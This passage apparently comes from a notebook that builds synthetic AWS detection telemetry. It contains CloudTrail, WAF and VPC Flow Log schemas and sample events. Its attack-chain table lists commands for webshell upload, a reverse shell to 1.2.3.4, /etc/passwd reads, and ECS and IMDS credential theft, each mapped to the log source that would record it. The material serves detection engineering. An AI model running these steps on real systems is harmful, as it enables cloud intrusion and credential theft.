      "Family": "logging-sidecar",
      "Version": "3",
      "DesiredStatus": "RUNNING",
      "KnownStatus": "RUNNING",
      "Containers": [
        {
          "DockerId": "aa11bb22cc33",
          "Name": "fluentbit",
          "Image": "amazon/aws-for-fluent-bit:stable",
          "KnownStatus": "RUNNING"
        }
      ]
    }
  ]
}


## Synthetic Attack Chain Mapping

| Step # | Action Description | Synthetic Command(s) | Expected Telemetry / Log Source |
|------|--------------------|----------------------|----------------------------------|
| 1 & 2 | WebShell Upload & Reverse Shell (Initial Access) | `POST /api/v1/uploads?filename=shell.php`<br>`GET /uploads/shell.php?cmd=python3 ...` | **WAF Logs** (HTTP POST/GET)<br>**VPC Flow Logs** (Outbound connection to `1.2.3.4`)<br>**ECS Runtime Monitoring** (Process execution) |
| 3 | Local Reconnaissance (Env Variables) | `whoami`<br>`cat /etc/passwd`<br>`env` | **ECS Runtime Monitoring** / **Auditd** (Execution of recon binaries) |
| 4 | ECS Container Enumeration | `curl $ECS_CONTAINER_METADATA_URI_V4/task`<br>`curl 169.254.170.2` | **VPC Flow Logs** (Intra-host traffic to `169.254.170.2`)<br>**ECS Task Metadata Logs** |
| 5 | Credential Theft & Identity Discovery | `curl http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`<br>`aws sts get-caller-identity` | **CloudTrail** (`GetCallerIdentity`)<br>**VPC Flow Logs** (Metadata service access) |
| 6 | Permission Enumeration | `aws iam simulate-custom-policy --policy-input-list ...` | **CloudTrail** (`SimulateCustomPolicy` / `SimulatePrincipalPolicy`) |
| 7 | Data Access / Impact | `aws s3 ls`<br>`aws secretsmanager list-secrets` | **CloudTrail** (`ListBuckets`, `ListSecrets`)<br>**S3 Data Events** (if enabled) |
| 8 | Lateral Movement (Other Host Tasks) | `curl 127.0.0.1:51678/v1/tasks` | **VPC Flow Logs** (Localhost traffic to ECS Agent port `51678`) |
| 9 | Broader Host Metadata Access | `TOKEN=$(curl -X PUT "169.254.169.254" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")`<br>`curl -H "X-aws-ec2-metadata-token: $TOKEN" 169.254.169.254/...` | **VPC Flow Logs** (IMDS access attempts)<br>**Host-level telemetry** (if enabled) |


In [None]:
{
  "eventTime": "// UTC timestamp when the API request completed; sourced from the AWS service endpoint host clock (NTP-synchronized). Mandatory: true",

  "eventVersion": "// CloudTrail event format version in major.minor form (e.g., 1.11); major changes indicate breaking schema changes, minor adds new fields. Mandatory: true",

  "userIdentity": "// Information about the IAM principal (user, role, federated user, or AWS service) that made the request; see CloudTrail userIdentity documentation. Mandatory: true",

  "eventSource": "// AWS service endpoint the request was sent to (e.g., ec2.amazonaws.com, s3.amazonaws.com); usually service-name.amazonaws.com with known exceptions. Mandatory: true",

  "eventName": "// API action name invoked on the service (e.g., RunInstances, CreateBucket). Mandatory: true",

  "awsRegion": "// AWS Region where the request was processed (e.g., us-east-1). Mandatory: true",

  "sourceIPAddress": "// Source IP address or DNS name from which the request originated; may be AWS Internal/# for AWS-originated events. Mandatory: true",

  "userAgent": "// Client or service that made the request (AWS Console, SDK, CLI, or AWS service); truncated if exceeding size limits. Mandatory: false",

  "errorCode": "// AWS service error code returned if the request failed (e.g., AccessDenied, VpceAccessDenied); omitted if request succeeded. Mandatory: false",

  "errorMessage": "// Human-readable error description returned by the service; may reflect authorization or policy failures. Mandatory: false",

  "requestParameters": "// Parameters supplied with the API request as defined by the service API reference; omitted if exceeding size limits. Mandatory: true",

  "responseElements": "// Response data returned by the API for write actions; null for read-only or non-returning actions. Mandatory: true",

  "additionalEventData": "// Supplemental event-specific data not included in request or response (e.g., MFAUsed for console sign-ins). Mandatory: false",

  "requestID": "// Service-generated unique identifier for the API request; useful for AWS Support correlation. Mandatory: false",

  "eventID": "// Globally unique identifier generated by CloudTrail for this event; suitable as a primary key. Mandatory: true",

  "eventType": "// Classification of event origin (AwsApiCall, AwsServiceEvent, AwsConsoleAction, AwsConsoleSignIn, AwsVpceEvents). Mandatory: true",

  "apiVersion": "// API version associated with AwsApiCall events; populated only for applicable event types. Mandatory: false",

  "managementEvent": "// Boolean indicating whether the event is a management event; present for supported event types when eventVersion >= 1.06. Mandatory: false",

  "readOnly": "// Boolean indicating whether the API operation was read-only (true) or write (false). Mandatory: false",

  "resources": "// List of AWS resources involved in the event, including ARNs, owning account IDs, and resource type identifiers. Mandatory: false",

  "recipientAccountId": "// AWS account ID that received the event; may differ from userIdentity.accountId in cross-account scenarios. Mandatory: false",

  "serviceEventDetails": "// Details for AWS service-generated events, including trigger and outcome; size-limited. Mandatory: false",

  "sharedEventID": "// Identifier shared across CloudTrail events generated by the same AWS action delivered to multiple accounts. Mandatory: false",

  "vpcEndpointId": "// Identifier of the VPC endpoint through which the request was routed; often AWS Internal for service-originated events. Mandatory: false",

  "vpcEndpointAccountId": "// AWS account ID that owns the VPC endpoint used by the request. Mandatory: false",

  "eventCategory": "// High-level category of event used for filtering (Management, Data, NetworkActivity). Mandatory: true",

  "addendum": "// Metadata added after initial logging to explain delayed delivery or updated/missing fields; includes reason and updated field references. Mandatory: false",

  "sessionCredentialFromConsole": "// Indicates the API call originated from an AWS Management Console session via proxy or external client; only present if true. Mandatory: false",

  "eventContext": "// Enriched context including IAM global condition keys and resource tags; present only for event data stores configured for enrichment. Mandatory: false",

  "edgeDeviceDetails": "// Metadata about edge devices targeted by the request (e.g., S3 Outposts devices). Mandatory: false",

  "tlsDetails": {
    "tlsVersion": "// TLS protocol version used for the request.",
    "cipherSuite": "// Cryptographic cipher suite negotiated for the TLS connection.",
    "clientProvidedHostHeader": "// Client-provided host name (typically service endpoint FQDN).",
    "keyExchange": "// TLS key exchange method indicating classical or post-quantum cryptography."
  }
}


In [None]:
{
  "eventTime": "2025-12-16T16:10:00Z",
  "eventVersion": "1.09",
  "userIdentity": {
    "type": "IAMUser",
    "principalId": "AIDACKCEVSQ6C2EXAMPLE",
    "arn": "arn:aws:iam::123456789012:user/SecurityAuditor-User",
    "accountId": "123456789012",
    "accessKeyId": "AKIAIOSFODNN7EXAMPLE",
    "userName": "SecurityAuditor-User"
  },
  "eventSource": "ecs.amazonaws.com",
  "eventName": "ListClusters",
  "awsRegion": "us-east-1",
  "sourceIPAddress": "192.0.2.101",
  "userAgent": "aws-cli/2.15.0 Python/3.11.6 Linux/6.1.0-release",
  "requestParameters": {
    "maxResults": 20
  },
  "responseElements": {
    "clusterArns": [
      "arn:aws:ecs:us-east-1:123456789012:cluster/Production-Facing-Web",
      "arn:aws:ecs:us-east-1:123456789012:cluster/Dev-Testing-Cluster"
    ],
    "nextToken": "eyJsYXN0RXZlbnRJZCI6IjExMTExMSIsImV4cGlyYXRpb24iOiIyMDI1LTEyLTE2VDE2OjEwOjAwWiJ9"
  },
  "additionalEventData": {
    "SignatureVersion": "SigV4",
    "CipherSuite": "ECDHE-RSA-AES128-GCM-SHA256"
  },
  "requestID": "a1b2c3d4-5678-90ab-cdef-1234567890ab",
  "eventID": "c5d6e7f8-g9h0-i1j2-k3l4-m5n6o7p8q9r0",
  "readOnly": true,
  "eventType": "AwsApiCall",
  "apiVersion": "2014-11-13",
  "managementEvent": true,
  "recipientAccountId": "123456789012",
  "eventCategory": "Management",
  "tlsDetails": {
    "tlsVersion": "TLSv1.3",
    "cipherSuite": "TLS_AES_128_GCM_SHA256",
    "clientProvidedHostHeader": "ecs.us-east-1.amazonaws.com"
  }
}


In [None]:
{
  "eventTime": "2025-12-16T15:45:00Z",
  "eventVersion": "1.09",
  "userIdentity": {
    "type": "AssumedRole",
    "principalId": "AROAEXTERNALPRINCIPAL:Pacu-Session-72",
    "arn": "arn:aws:sts::999988887777:assumed-role/ExternalReconRole/Pacu-Session-72",
    "accountId": "999988887777",
    "accessKeyId": "ASIAWEXAMPLEACCESSKEY",
    "sessionContext": {
      "sessionIssuer": {
        "type": "Role",
        "principalId": "AROAEXTERNALPRINCIPAL",
        "arn": "arn:aws:iam::999988887777:role/ExternalReconRole",
        "accountId": "999988887777",
        "userName": "ExternalReconRole"
      },
      "attributes": {
        "creationDate": "2025-12-16T15:40:00Z",
        "mfaAuthenticated": "false"
      }
    }
  },
  "eventSource": "ecs.amazonaws.com",
  "eventName": "ListClusters",
  "awsRegion": "us-east-1",
  "sourceIPAddress": "203.0.113.50",
  "userAgent": "Pacu/1.1.0 (github.com) Boto3/1.26.151 Python/3.10.12",
  "requestParameters": {
    "maxResults": 100
  },
  "responseElements": {
    "clusterArns": [
      "arn:aws:ecs:us-east-1:123456789012:cluster/Internal-Mainframe",
      "arn:aws:ecs:us-east-1:123456789012:cluster/Public-App-Cluster"
    ]
  },
  "additionalEventData": {
    "SignatureVersion": "SigV4",
    "CipherSuite": "ECDHE-RSA-AES128-GCM-SHA256"
  },
  "requestID": "e9876543-210a-bcde-f012-34567890abcd",
  "eventID": "d1c2b3a4-e5f6-7890-g1h2-i3j4k5l6m7n8",
  "readOnly": true,
  "eventType": "AwsApiCall",
  "apiVersion": "2014-11-13",
  "managementEvent": true,
  "recipientAccountId": "123456789012",
  "eventCategory": "Management",
  "tlsDetails": {
    "tlsVersion": "TLSv1.2",
    "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256",
    "clientProvidedHostHeader": "ecs.us-east-1.amazonaws.com"
  }
}


In [None]:
{
  "eventTime": "2025-12-16T17:05:00Z",
  "eventVersion": "1.09",
  "userIdentity": {
    "type": "AssumedRole",
    "principalId": "AROAEXAMPLEINSTANCEROLE:i-0abcdef1234567890",
    "arn": "arn:aws:sts::123456789012:assumed-role/ECS-Host-Role/i-0abcdef1234567890",
    "accountId": "123456789012",
    "accessKeyId": "ASIAWEXAMPLESECRETKEY",
    "sessionContext": {
      "sessionIssuer": {
        "type": "Role",
        "principalId": "AROAEXAMPLEINSTANCEROLE",
        "arn": "arn:aws:iam::123456789012:role/ECS-Host-Role",
        "accountId": "123456789012",
        "userName": "ECS-Host-Role"
      }
    }
  },
  "eventSource": "ecs.amazonaws.com",
  "eventName": "ListClusters",
  "awsRegion": "us-east-1",
  "sourceIPAddress": "10.0.1.50",
  "userAgent": "aws-sdk-go/1.44.0 (go1.18.1; linux; amd64)",
  "requestParameters": {},
  "responseElements": {
    "clusterArns": [
      "arn:aws:ecs:us-east-1:123456789012:cluster/Production-App-Cluster"
    ]
  },
  "additionalEventData": {
    "SignatureVersion": "SigV4"
  },
  "requestID": "d2e3f4g5-6789-0abc-def1-234567890abc",
  "eventID": "e3f4g5h6-7890-abcd-ef12-34567890abcd",
  "readOnly": true,
  "eventType": "AwsApiCall",
  "managementEvent": true,
  "recipientAccountId": "123456789012",
  "eventCategory": "Management",
  "tlsDetails": {
    "tlsVersion": "TLSv1.3",
    "cipherSuite": "TLS_AES_128_GCM_SHA256"
  }
}


In [None]:
# AWSLogs/o-<org>/<account>/CloudTrail/<region>/<year>/<month>/<day>/<file>.json.gz
# AccountID_CloudTrail_RegionName_YYYYMMDDTHHmmZ_UniqueString.FileNameFormat
# 111122223333_CloudTrail_us-east-2_20150801T0210Z_Mu0KsOhtH1ar15ZZ.json.gz

  {
  "Records": [
    {
      "eventTime": "2025-12-16T12:00:00Z",
      "eventVersion": "1.11",
      "userIdentity": {
        "type": "IAMUser",
        "principalId": "AIDACKCEVSQ6C2EXAMPLE",
        "arn": "arn:aws:iam::123456789012:user/SyntheticTestUser",
        "accountId": "123456789012",
        "accessKeyId": "AKIAIOSFODNN7EXAMPLE",
        "userName": "SyntheticTestUser"
      },
      "eventSource": "ecs.amazonaws.com",
      "eventName": "DescribeInstances",
      "awsRegion": "us-east-1",
      "sourceIPAddress": "192.0.2.1",
      "userAgent": "Linux/2.6.18-164.el5",
      "errorCode": "",
      "errorMessage": "",
      "requestParameters": null,
      "responseElements": null,
      "requestID": "89b3f3b1-4c12-402a-9e11-example",
      "eventID": "4b684074-6f02-4b21-8201-example",
      "eventType": "AwsApiCall",
      "managementEvent": true,
      "readOnly": true,
      "resources": [
                        {
                           "ARN": "arn:aws:iam::111122223333:role/EC2-dev",
                           "accountId": "111122223333",
                           "type": "AWS::IAM::Role"
                        }
                  ]
      "recipientAccountId": "123456789012",
      "serviceEventDetails": "",
      "sharedEventID":"",
      "vpcEndpointId": ""
      "vpcEndpointAccountId":""
      "eventCategory":"Management"
    }
  ]
}


In [None]:
# WAF schema
 {
  "$schema": "https://json-schema.org/draft/2020-12/schema",
  "title": "AWS WAF Log Event",
  "description": "Canonical schema representing a single AWS WAF log entry.",
  "type": "object",

  "properties": {
    "timestamp": {
      "type": "integer",
      "description": "Epoch timestamp in milliseconds when AWS WAF processed the request."
    },

    "formatVersion": {
      "type": "integer",
      "description": "Version of the AWS WAF log format."
    },

    "webaclId": {
      "type": "string",
      "description": "The GUID of the web ACL (protection pack) that evaluated the request."
    },

    "action": {
      "type": "string",
      "enum": ["ALLOW", "BLOCK", "CAPTCHA", "CHALLENGE"],
      "description": "The terminating action applied by AWS WAF."
    },

    "terminatingRuleId": {
      "type": "string",
      "description": "ID of the rule that terminated request inspection, or Default_Action."
    },

    "terminatingRuleType": {
      "type": "string",
      "enum": ["RATE_BASED", "REGULAR", "GROUP", "MANAGED_RULE_GROUP"],
      "description": "Type of rule that terminated the request."
    },

    "terminatingRuleMatchDetails": {
      "type": "array",
      "description": "Match details for the terminating rule. Populated for SQLi and XSS rules.",
      "items": {
        "$ref": "#/$defs/ruleMatchDetail"
      }
    },

    "httpSourceName": {
      "type": "string",
      "enum": ["CF", "APIGW", "ALB", "APPSYNC", "COGNITOIDP", "APPRUNNER", "VERIFIED_ACCESS"],
      "description": "Service that received the request."
    },

    "httpSourceId": {
      "type": "string",
      "description": "ARN-based identifier of the protected resource."
    },

    "httpRequest": {
      "$ref": "#/$defs/httpRequest"
    },

    "labels": {
      "type": "array",
      "description": "Labels applied to the request by AWS WAF rules (up to 100).",
      "items": {
        "type": "object",
        "properties": {
          "name": {
            "type": "string",
            "description": "Fully qualified AWS WAF label name."
          }
        },
        "required": ["name"]
      }
    },

    "nonTerminatingMatchingRules": {
      "type": "array",
      "description": "Rules that matched the request but did not terminate inspection.",
      "items": {
        "$ref": "#/$defs/nonTerminatingRule"
      }
    },

    "ruleGroupList": {
      "type": "array",
      "description": "Rule groups that evaluated the request.",
      "items": {
        "$ref": "#/$defs/ruleGroup"
      }
    },

    "rateBasedRuleList": {
      "type": "array",
      "description": "Rate-based rules that evaluated or acted on the request.",
      "items": {
        "$ref": "#/$defs/rateBasedRule"
      }
    },

    "captchaResponse": {
      "$ref": "#/$defs/captchaOrChallengeResponse"
    },

    "challengeResponse": {
      "$ref": "#/$defs/captchaOrChallengeResponse"
    },

    "oversizeFields": {
      "type": "array",
      "description": "Request components exceeding AWS WAF inspection size limits.",
      "items": {
        "type": "string",
        "enum": [
          "REQUEST_BODY",
          "REQUEST_JSON_BODY",
          "REQUEST_HEADERS",
          "REQUEST_COOKIES"
        ]
      }
    },

    "requestHeadersInserted": {
      "type": "array",
      "description": "Headers inserted by custom request handling.",
      "items": {
        "$ref": "#/$defs/header"
      }
    },

    "responseCodeSent": {
      "type": "string",
      "description": "HTTP response code sent by AWS WAF custom response."
    },

    "ja3Fingerprint": {
      "type": "string",
      "description": "JA3 TLS fingerprint (32-character hash)."
    },

    "ja4Fingerprint": {
      "type": "string",
      "description": "JA4 TLS fingerprint (36-character hash)."
    },

    "clientAsn": {
      "type": "integer",
      "description": "ASN associated with the client IP. Logged only when ASN match is used."
    },

    "forwardedAsn": {
      "type": "integer",
      "description": "ASN of the entity that forwarded the request."
    },

    "requestId": {
      "type": "string",
      "description": "Request ID generated by the underlying service."
    }
  },

  "$defs": {
    "httpRequest": {
      "type": "object",
      "description": "Metadata describing the HTTP request.",
      "properties": {
        "clientIp": { "type": "string" },
        "country": { "type": "string" },
        "httpMethod": { "type": "string" },
        "httpVersion": { "type": "string" },
        "uri": { "type": "string" },
        "args": { "type": "string" },
        "fragment": { "type": "string" },
        "headers": {
          "type": "array",
          "items": { "$ref": "#/$defs/header" }
        }
      }
    },

    "header": {
      "type": "object",
      "properties": {
        "name": { "type": "string" },
        "value": { "type": "string" }
      },
      "required": ["name", "value"]
    },

    "ruleMatchDetail": {
      "type": "object",
      "properties": {
        "conditionType": { "type": "string" },
        "sensitivityLevel": { "type": "string" },
        "location": { "type": "string" },
        "matchedData": {
          "type": "array",
          "items": { "type": "string" }
        }
      }
    },

    "captchaOrChallengeResponse": {
      "type": "object",
      "properties": {
        "responseCode": { "type": "string" },
        "solveTimestamp": { "type": "string" },
        "failureReason": { "type": "string" }
      }
    },

    "nonTerminatingRule": {
      "type": "object",
      "properties": {
        "ruleId": { "type": "string" },
        "action": {
          "type": "string",
          "enum": ["COUNT", "CAPTCHA", "CHALLENGE"]
        },
        "ruleMatchDetails": {
          "type": "array",
          "items": { "$ref": "#/$defs/ruleMatchDetail" }
        }
      }
    },

    "ruleGroup": {
      "type": "object",
      "properties": {
        "ruleGroupId": { "type": "string" },
        "terminatingRule": {
          "type": "object",
          "properties": {
            "ruleId": { "type": "string" },
            "action": { "type": "string" }
          }
        },
        "excludedRules": {
          "type": "array",
          "items": {
            "type": "object",
            "properties": {
              "ruleId": { "type": "string" },
              "exclusionType": { "type": "string" }
            }
          }
        }
      }
    },

    "rateBasedRule": {
      "type": "object",
      "properties": {
        "rateBasedRuleId": { "type": "string" },
        "rateBasedRuleName": { "type": "string" },
        "limitKey": { "type": "string" },
        "limitValue": { "type": "string" },
        "maxRateAllowed": { "type": "integer" },
        "evaluationWindowSec": { "type": "integer" },
        "customValues": {
          "type": "array",
          "items": { "type": "string" }
        }
      }
    }
  }
}


In [None]:
# web acl waf logs
{
  "type": "object",
  "properties": {
    "action": {
      "type": "string",
      "enum": ["ALLOW", "BLOCK", "CAPTCHA", "CHALLENGE"],
      "description": "The terminating action applied to the request."
    },
    "args": { "type": "string", "description": "The query string." },
    "captchaResponse": {
      "type": ["object", "null"],
      "description": "Populated when CAPTCHA action is applied.",
      "properties": {
        "responseCode": { "type": "integer", "description": "Response code for terminating CAPTCHA." },
        "failureReason": { "type": "string", "description": "Reason for failure if CAPTCHA is terminating." },
        "solveTimestamp": { "type": "integer", "description": "Timestamp if CAPTCHA is non-terminating." }
      }
    },
    "cfDistributionTenantId": { "type": ["string", "null"], "description": "CloudFront distribution tenant ID (optional)." },
    "challengeResponse": {
      "type": ["object", "null"],
      "description": "Populated when Challenge action is applied.",
      "properties": {
        "responseCode": { "type": "integer", "description": "Response code for terminating Challenge." },
        "failureReason": { "type": "string", "description": "Reason for failure if Challenge is terminating." },
        "solveTimestamp": { "type": "integer", "description": "Timestamp if Challenge is non-terminating." }
      }
    },
    "clientAsn": { "type": ["integer", "null"], "description": "ASN of request origin. Logged only if ASN match used." },
    "clientIp": { "type": "string", "description": "Client IP address." },
    "country": { "type": "string", "description": "Source country, '-' if unknown." },
    "excludedRules": {
      "type": "array",
      "items": {
        "type": "object",
        "properties": {
          "exclusionType": { "type": "string", "enum": ["COUNT"], "description": "Indicates rule is excluded via Count action." },
          "ruleId": { "type": "string", "description": "ID of excluded rule." }
        }
      }
    },
    "formatVersion": { "type": "integer", "description": "Format version of the log." },
    "forwardedAsn": { "type": ["integer", "null"], "description": "ASN of forwarded entity (optional)." },
    "headers": { "type": "array", "items": { "type": "object" }, "description": "List of headers." },
    "httpMethod": { "type": "string", "description": "HTTP method." },
    "httpRequest": { "type": "object", "description": "Metadata about the HTTP request." },
    "httpSourceId": { "type": "string", "description": "ID of the associated resource in ARN format." },
    "httpSourceName": {
      "type": "string",
      "enum": ["CF", "APIGW", "ALB", "APPSYNC", "COGNITOIDP", "APPRUNNER", "VERIFIED_ACCESS"],
      "description": "Source of the request."
    },
    "httpVersion": { "type": "string", "description": "HTTP version." },
    "ja3Fingerprint": { "type": ["string", "null"], "maxLength": 32, "description": "JA3 TLS fingerprint." },
    "ja4Fingerprint": { "type": ["string", "null"], "maxLength": 36, "description": "JA4 TLS fingerprint." },
    "labels": { "type": "array", "items": { "type": "string" }, "description": "Labels applied by rules, first 100 logged." },
    "nonTerminatingMatchingRules": {
      "type": "array",
      "items": {
        "type": "object",
        "properties": {
          "action": { "type": "string", "enum": ["COUNT", "CAPTCHA", "CHALLENGE"], "description": "Action applied." },
          "ruleId": { "type": "string", "description": "ID of non-terminating rule." },
          "ruleMatchDetails": { "type": "array", "items": { "type": "object" }, "description": "Details of matched rules (SQLi/XSS)." },
          "captchaResponse": { "type": ["object", "null"], "description": "Nested CAPTCHA info if applicable." },
          "challengeResponse": { "type": ["object", "null"], "description": "Nested Challenge info if applicable." },
          "overriddenAction": { "type": ["string", "null"], "description": "Configured action if overridden." }
        }
      }
    },
    "oversizeFields": {
      "type": "array",
      "items": { "type": "string", "enum": ["REQUEST_BODY", "REQUEST_JSON_BODY", "REQUEST_HEADERS", "REQUEST_COOKIES"] },
      "description": "Fields over AWS WAF inspection limit."
    },
    "rateBasedRuleList": { "type": "array", "items": { "type": "object" }, "description": "Rate-based rules applied." },
    "rateBasedRuleId": { "type": ["string", "null"], "description": "ID of rate-based rule that acted on request." },
    "rateBasedRuleName": { "type": ["string", "null"], "description": "Name of rate-based rule." },
    "limitKey": { "type": "string", "enum": ["IP", "FORWARDED_IP", "CUSTOMKEYS", "CONSTANT"], "description": "Type of aggregation for rate-based rules." },
    "limitValue": { "type": ["string", "null"], "description": "Limit value, 'INVALID' if IP is invalid." },
    "maxRateAllowed": { "type": "integer", "description": "Maximum requests allowed in the evaluation window." },
    "evaluationWindowSec": { "type": "integer", "description": "Time window in seconds." },
    "customValues": { "type": "array", "items": { "type": "string" }, "description": "Unique values identified by rate-based rule." },
    "requestHeadersInserted": { "type": "array", "items": { "type": "object" }, "description": "Headers inserted for custom handling." },
    "requestId": { "type": "string", "description": "Request ID from host service." },
    "responseCodeSent": { "type": "integer", "description": "Response code sent with custom response." },
    "ruleGroupId": { "type": ["string", "null"], "description": "ID of rule group." },
    "ruleGroupList": { "type": "array", "items": { "type": "object" }, "description": "List of rule groups that acted on the request." },
    "terminatingRule": {
      "type": ["object", "null"],
      "description": "Rule that terminated the request.",
      "properties": {
        "action": { "type": "string", "enum": ["ALLOW", "BLOCK", "CAPTCHA", "CHALLENGE"] },
        "ruleId": { "type": "string" },
        "ruleMatchDetails": { "type": "array", "items": { "type": "object" } },
        "captchaResponse": { "type": ["object", "null"] },
        "challengeResponse": { "type": ["object", "null"] },
        "overriddenAction": { "type": ["string", "null"] }
      }
    },
    "terminatingRuleId": { "type": "string", "description": "ID of rule that terminated the request, 'Default_Action' if none." },
    "terminatingRuleMatchDetails": { "type": "array", "items": { "type": "object" }, "description": "Details for terminating rule matches (SQLi/XSS)." },
    "terminatingRuleType": { "type": "string", "enum": ["RATE_BASED", "REGULAR", "GROUP", "MANAGED_RULE_GROUP"] },
    "timestamp": { "type": "integer", "description": "Timestamp in milliseconds." },
    "uri": { "type": "string", "description": "Request URI." },
    "fragment": { "type": ["string", "null"], "description": "Fragment part of URL after '#'." },
    "webaclId": { "type": "string", "description": "GUID of the Web ACL." }
  },
  "required": ["action", "clientIp", "country", "formatVersion", "httpMethod", "httpSourceId", "httpSourceName", "timestamp", "uri", "webaclId"]
}


In [None]:
{
  "timestamp": 1739872800000,
  "formatVersion": 1,
  "webaclId": "arn:aws:wafv2:us-east-1:123456789012:regional/webacl/Main-Production-ACL/a1b2c3d4-e5f6-7g8h-9i0j-k1l2m3n4o5p6",
  "action": "ALLOW",
  "terminatingRuleId": "Default_Action",
  "terminatingRuleType": "REGULAR",
  "httpSourceName": "ALB",
  "httpSourceId": "arn:aws:elasticloadbalancing:us-east-1:123456789012:loadbalancer/app/my-load-balancer/50dc6c495c0c9188",
  "httpRequest": {
    "clientIp": "192.0.2.45",
    "country": "US",
    "httpMethod": "GET",
    "httpVersion": "HTTP/1.1",
    "uri": "/api/v1/user/profile",
    "args": "id=9982&verbose=true",
    "headers": [
      {
        "name": "Host",
        "value": "example.com"
      },
      {
        "name": "User-Agent",
        "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
      },
      {
        "name": "Accept",
        "value": "*/*"
      },
      {
        "name": "X-Forwarded-For",
        "value": "192.0.2.45"
      }
    ]
  },
  "labels": [
    {
      "name": "awswaf:managed:aws:core-rule-set:SizeRestrictions_Body"
    }
  ],
  "nonTerminatingMatchingRules": [
    {
      "ruleId": "AWS-AWSManagedRulesCommonRuleSet",
      "action": "COUNT",
      "ruleMatchDetails": []
    }
  ],
  "ruleGroupList": [
    {
      "ruleGroupId": "AWS#AWSManagedRulesCommonRuleSet",
      "terminatingRule": null,
      "nonTerminatingMatchingRules": [
        {
          "ruleId": "SizeRestrictions_Body",
          "action": "COUNT"
        }
      ],
      "excludedRules": []
    }
  ],
  "rateBasedRuleList": [],
  "requestId": "1-65cf8a30-0eb5632d43109a90288825f1",
  "ja3Fingerprint": "7719a056d696a119d3ed71ee4d22f183"
}


In [None]:
{
  "$schema": "https://json-schema.org/draft/2020-12/schema",
  "title": "AWS VPC Flow Log Schema",
  "type": "object",
  "properties": {
    "version": {
      "type": "integer",
      "description": "VPC Flow Logs version. Default is 2. Custom format version is highest among specified fields.",
      "examples": [2]
    },
    "account-id": {
      "type": "string",
      "description": "AWS account ID of the owner of the source network interface."
    },
    "interface-id": {
      "type": "string",
      "description": "ID of the network interface for which traffic is recorded. '-' for flows from NAT gateway."
    },
    "srcaddr": {
      "type": "string",
      "description": "Source IP address. For outgoing traffic, it's the interface's private IP. For NAT gateway, see pkt-srcaddr."
    },
    "dstaddr": {
      "type": "string",
      "description": "Destination IP address. For NAT gateway, see pkt-dstaddr."
    },
    "srcport": {
      "type": "integer",
      "description": "Source port number."
    },
    "dstport": {
      "type": "integer",
      "description": "Destination port number."
    },
    "protocol": {
      "type": "integer",
      "description": "IANA protocol number of the traffic."
    },
    "packets": {
      "type": "integer",
      "description": "Number of packets transferred during the flow."
    },
    "bytes": {
      "type": "integer",
      "description": "Number of bytes transferred during the flow."
    },
    "start": {
      "type": "integer",
      "description": "Unix timestamp of the first packet in the aggregation interval."
    },
    "end": {
      "type": "integer",
      "description": "Unix timestamp of the last packet in the aggregation interval."
    },
    "action": {
      "type": "string",
      "enum": ["ACCEPT", "REJECT"],
      "description": "Action associated with the traffic.",
      "x-enumDescriptions": {
        "ACCEPT": "The traffic was accepted.",
        "REJECT": "The traffic was rejected (e.g., blocked by security groups or network ACLs)."
      }
    },
    "log-status": {
      "type": "string",
      "enum": ["OK", "NODATA", "SKIPDATA"],
      "description": "Logging status of the flow log.",
      "x-enumDescriptions": {
        "OK": "Data is logging normally to the chosen destinations.",
        "NODATA": "No network traffic during aggregation interval.",
        "SKIPDATA": "Some flow log records were skipped due to internal AWS constraints or errors."
      }
    },
    "vpc-id": { "type": "string" },
    "subnet-id": { "type": "string", "description": "'-' for NAT gateway flows." },
    "instance-id": { "type": "string", "description": "'-' for requester-managed network interfaces." },
    "tcp-flags": { "type": "integer", "description": "Bitmask for TCP flags. FIN=1, SYN=2, RST=4, SYN-ACK=18, 0 if none." },
    "type": {
      "type": "string",
      "enum": ["IPv4", "IPv6", "EFA"],
      "x-enumDescriptions": {
        "IPv4": "IPv4 traffic.",
        "IPv6": "IPv6 traffic.",
        "EFA": "Elastic Fabric Adapter traffic."
      }
    },
    "pkt-srcaddr": { "type": "string" },
    "pkt-dstaddr": { "type": "string" },
    "region": { "type": "string" },
    "az-id": { "type": "string" },
    "sublocation-type": {
      "type": "string",
      "enum": ["wavelength", "outpost", "localzone", "-"],
      "x-enumDescriptions": {
        "wavelength": "Traffic from Wavelength Zone.",
        "outpost": "Traffic from AWS Outpost.",
        "localzone": "Traffic from AWS Local Zone.",
        "-": "Not from a sublocation."
      }
    },
    "sublocation-id": { "type": "string", "description": "'-' if not from a sublocation." },
    "pkt-src-aws-service": {
      "type": "string",
      "enum": ["AMAZON","AMAZON_APPFLOW","AMAZON_CONNECT","API_GATEWAY","AURORA_DSQL","CHIME_MEETINGS","CHIME_VOICECONNECTOR","CLOUD9","CLOUDFRONT","CLOUDFRONT_ORIGIN_FACING","CODEBUILD","DYNAMODB","EBS","EC2","EC2_INSTANCE_CONNECT","GLOBALACCELERATOR","IVS_LOW_LATENCY","IVS_REALTIME","KINESIS_VIDEO_STREAMS","MEDIA_PACKAGE_V2","ROUTE53","ROUTE53_HEALTHCHECKS","ROUTE53_HEALTHCHECKS_PUBLISHING","ROUTE53_RESOLVER","S3","WORKSPACES_GATEWAYS"],
      "description": "AWS service for the pkt-srcaddr field.",
      "x-enumDescriptions": {
        "AMAZON": "Amazon-owned IP ranges",
        "AMAZON_APPFLOW": "AWS AppFlow IP ranges",
        "AMAZON_CONNECT": "Amazon Connect IP ranges",
        "API_GATEWAY": "API Gateway IP ranges",
        "AURORA_DSQL": "Aurora DSQL IP ranges",
        "CHIME_MEETINGS": "Chime Meetings IP ranges",
        "CHIME_VOICECONNECTOR": "Chime Voice Connector IP ranges",
        "CLOUD9": "Cloud9 IP ranges",
        "CLOUDFRONT": "CloudFront IP ranges",
        "CLOUDFRONT_ORIGIN_FACING": "CloudFront Origin-Facing IP ranges",
        "CODEBUILD": "CodeBuild IP ranges",
        "DYNAMODB": "DynamoDB IP ranges",
        "EBS": "EBS IP ranges",
        "EC2": "EC2 IP ranges",
        "EC2_INSTANCE_CONNECT": "EC2 Instance Connect IP ranges",
        "GLOBALACCELERATOR": "Global Accelerator IP ranges",
        "IVS_LOW_LATENCY": "IVS Low Latency IP ranges",
        "IVS_REALTIME": "IVS Realtime IP ranges",
        "KINESIS_VIDEO_STREAMS": "Kinesis Video Streams IP ranges",
        "MEDIA_PACKAGE_V2": "MediaPackage V2 IP ranges",
        "ROUTE53": "Route 53 IP ranges",
